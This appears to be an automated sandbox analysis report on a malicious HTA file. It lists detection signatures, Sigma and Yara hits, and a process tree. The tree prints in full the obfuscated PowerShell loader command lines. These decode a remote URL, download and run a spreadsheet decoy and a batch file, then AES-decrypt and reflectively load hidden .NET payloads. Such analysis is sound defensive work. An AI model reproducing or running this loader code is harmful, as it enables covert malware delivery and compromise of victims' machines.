Edit tour
Windows
Analysis Report
hta.hta
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Suspicious Office Outbound Connections
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7240 cmdline:
mshta.exe "C:\Users\ user\Deskt op\hta.hta " MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 7332 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted function z yfTBcnYzpr d($pHHdIof q, $hQvuJr y){[IO.Fil e]::WriteA llBytes($p HHdIofq, $ hQvuJry)}; function R sNIEjCO($p HHdIofq){i f($pHHdIof q.EndsWith ((ySHQDZBW wySzRGIG @ (61274,613 28,61336,6 1336))) -e q $True){r undll32.ex e $pHHdIof q }elseif( $pHHdIofq. EndsWith(( ySHQDZBWwy SzRGIG @(6 1274,61340 ,61343,612 77))) -eq $True){pow ershell.ex e -Executi onPolicy u nrestricte d -File $p HHdIofq}el seif($pHHd Iofq.EndsW ith((ySHQD ZBWwySzRGI G @(61274, 61337,6134 3,61333))) -eq $True ){misexec /qn /i $pH HdIofq}els e{Start-Pr ocess $pHH dIofq}};fu nction ZWu fiDkKJd($W fmgmuntIKB YcRft){$yw qrhKjGiioX guh = New- Object (yS HQDZBWwySz RGIG @(613 06,61329,6 1344,61274 ,61315,613 29,61326,6 1295,61336 ,61333,613 29,61338,6 1344));[Ne t.ServiceP ointManage r]::Securi tyProtocol = [Net.Se curityProt ocolType]: :TLS12;$hQ vuJry = $y wqrhKjGiio Xguh.Downl oadData($W fmgmuntIKB YcRft);ret urn $hQvuJ ry};functi on ySHQDZB WwySzRGIG( $xGZDVkPMY LYy){$yFBt dzpE=61228 ;$oUSwLv=$ Null;forea ch($fxEGQM N in $xGZD VkPMYLYy){ $oUSwLv+=[ char]($fxE GQMN-$yFBt dzpE)};ret urn $oUSwL v};functio n dDSCNJIj jRgIM(){$l BhpKXrqsdo dra = $env :AppData + '\';$RtGc EcBBqYud = $lBhpKXrq sdodra + ' jiteon.xls x';If(Test -Path -Pat h $RtGcEcB BqYud){Inv oke-Item $ RtGcEcBBqY ud;}Else{ $hKUnbCqsP bBsWBpNkbF = ZWufiDk KJd (ySHQD ZBWwySzRGI G @(61332, 61344,6134 4,61340,61 286,61275, 61275,6127 7,61285,61 279,61274, 61278,6127 8,61278,61 274,61285, 61282,6127 4,61277,61 277,61280, 61286,6128 3,61278,61 284,61283, 61275,6133 4,61333,61 344,61329, 61339,6133 8,61274,61 348,61336, 61343,6134 8));zyfTBc nYzprd $Rt GcEcBBqYud $hKUnbCqs PbBsWBpNkb F;Invoke-I tem $RtGcE cBBqYud;}; $gzgwwTbWp ZOp = $lBh pKXrqsdodr a + 'GoGi. bat'; if ( Test-Path -Path $gzg wwTbWpZOp) {RsNIEjCO $gzgwwTbWp ZOp;}Else{ $VgJdQKaf = ZWufiDk KJd (ySHQD ZBWwySzRGI G @(61332, 61344,6134 4,61340,61 286,61275, 61275,6127 7,61285,61 279,61274, 61278,6127 8,61278,61 274,61285, 61282,6127 4,61277,61 277,61280, 61286,6128 3,61278,61 284,61283, 61275,6129 9,61339,61 299,61333, 61274,6132 6,61325,61 344));zyfT BcnYzprd $ gzgwwTbWpZ Op $VgJdQK af;RsNIEjC O $gzgwwTb WpZOp;};;; ;}dDSCNJIj jRgIM; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7340 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - EXCEL.EXE (PID: 7500 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Root\Offi ce16\EXCEL .EXE" "C:\ Users\user \AppData\R oaming\jit eon.xlsx" MD5: 4A871771235598812032C822E6F68F19) - splwow64.exe (PID: 7896 cmdline:
C:\Windows \splwow64. exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73) - cmd.exe (PID: 7536 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\GoGi.ba t" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7544 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7580 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\AppD ata\Roamin g\GoGi.bat " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7588 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7628 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $host.U I.RawUI.Wi ndowTitle= 'C:\Users\ user\AppDa ta\Roaming \GoGi.bat' ;$gPQY='Cm YpnhamYpnn mYpngmYpne mYpnEmYpnx tmYpnenmYp nsmYpniomY pnnmYpn'.R eplace('mY pn', ''),' LoaUtEPdUt EP'.Replac e('UtEP', ''),'MaiCY gQnMCYgQod CYgQuleCYg Q'.Replace ('CYgQ', ' '),'SprHTn litrHTn'.R eplace('rH Tn', ''),' TrrzhRarzh RnsfrzhRor rzhRmFrzhR irzhRnarzh RlBlrzhRor zhRckrzhR' .Replace(' rzhR', '') ,'GetuUbXC uUbXuuUbXr uUbXreuUbX ntuUbXPuUb XrouUbXcuU bXesuUbXsu UbX'.Repla ce('uUbX', ''),'FrFE dOomBFEdOa sFEdOe64FE dOStrFEdOi FEdOngFEdO '.Replace( 'FEdO', '' ),'Reancld dLncldinen cldsncld'. Replace('n cld', ''), 'DjPqYejPq YcojPqYmpj PqYrejPqYs sjPqY'.Rep lace('jPqY ', ''),'IP IJhnvPIJho kPIJhePIJh '.Replace( 'PIJh', '' ),'CopZKPi yTZKPioZKP i'.Replace ('ZKPi', ' '),'ElIXGD eIXGDmIXGD enIXGDtAIX GDtIXGD'.R eplace('IX GD', ''),' CruXrmeuXr matuXrmeDe uXrmcryuXr mptuXrmoru Xrm'.Repla ce('uXrm', ''),'EJuQ RntJuQRrJu QRyPJuQRoi nJuQRtJuQR '.Replace( 'JuQR', '' );powershe ll -w hidd en;functio n oukWk($h MAdX){$uBE Eb=[System .Security. Cryptograp hy.Aes]::C reate();$u BEEb.Mode= [System.Se curity.Cry ptography. CipherMode ]::CBC;$uB EEb.Paddin g=[System. Security.C ryptograph y.PaddingM ode]::PKCS 7;$uBEEb.K ey=[System .Convert]: :($gPQY[6] )('TGdOerQ an8DiYOIpc 1W3E6Uf7wM JSi91JjPhd KuCB3Q='); $uBEEb.IV= [System.Co nvert]::($ gPQY[6])(' CruLH9j6ae x2cpz0fozZ +w==');$XB RRE=$uBEEb .($gPQY[12 ])();$gomw w=$XBRRE.( $gPQY[4])( $hMAdX,0,$ hMAdX.Leng th);$XBRRE .Dispose() ;$uBEEb.Di spose();$g omww;}func tion SIliJ ($hMAdX){$ nQeHe=New- Object Sys tem.IO.Mem oryStream( ,$hMAdX);$ EvPMN=New- Object Sys tem.IO.Mem oryStream; $uxdRy=New -Object Sy stem.IO.Co mpression. GZipStream ($nQeHe,[I O.Compress ion.Compre ssionMode] ::($gPQY[8 ]));$uxdRy .($gPQY[10 ])($EvPMN) ;$uxdRy.Di spose();$n QeHe.Dispo se();$EvPM N.Dispose( );$EvPMN.T oArray();} $WrkBk=[Sy stem.IO.Fi le]::($gPQ Y[7])([Con sole]::Tit le);$dItwN =SIliJ (ou kWk ([Conv ert]::($gP QY[6])([Sy stem.Linq. Enumerable ]::($gPQY[ 11])($WrkB k, 5).Subs tring(2))) );$Yylgf=S IliJ (oukW k ([Conver t]::($gPQY [6])([Syst em.Linq.En umerable]: :($gPQY[11 ])($WrkBk, 6).Substr ing(2)))); [System.Re flection.A ssembly]:: ($gPQY[1]) ([byte[]]$ Yylgf).($g PQY[13]).( $gPQY[9])( $null,$nul l);[System .Reflectio n.Assembly ]::($gPQY[ 1])([byte[ ]]$dItwN). ($gPQY[13] ).($gPQY[9 ])($null,$ null); " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - powershell.exe (PID: 7636 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 7828 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- svchost.exe (PID: 7916 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): |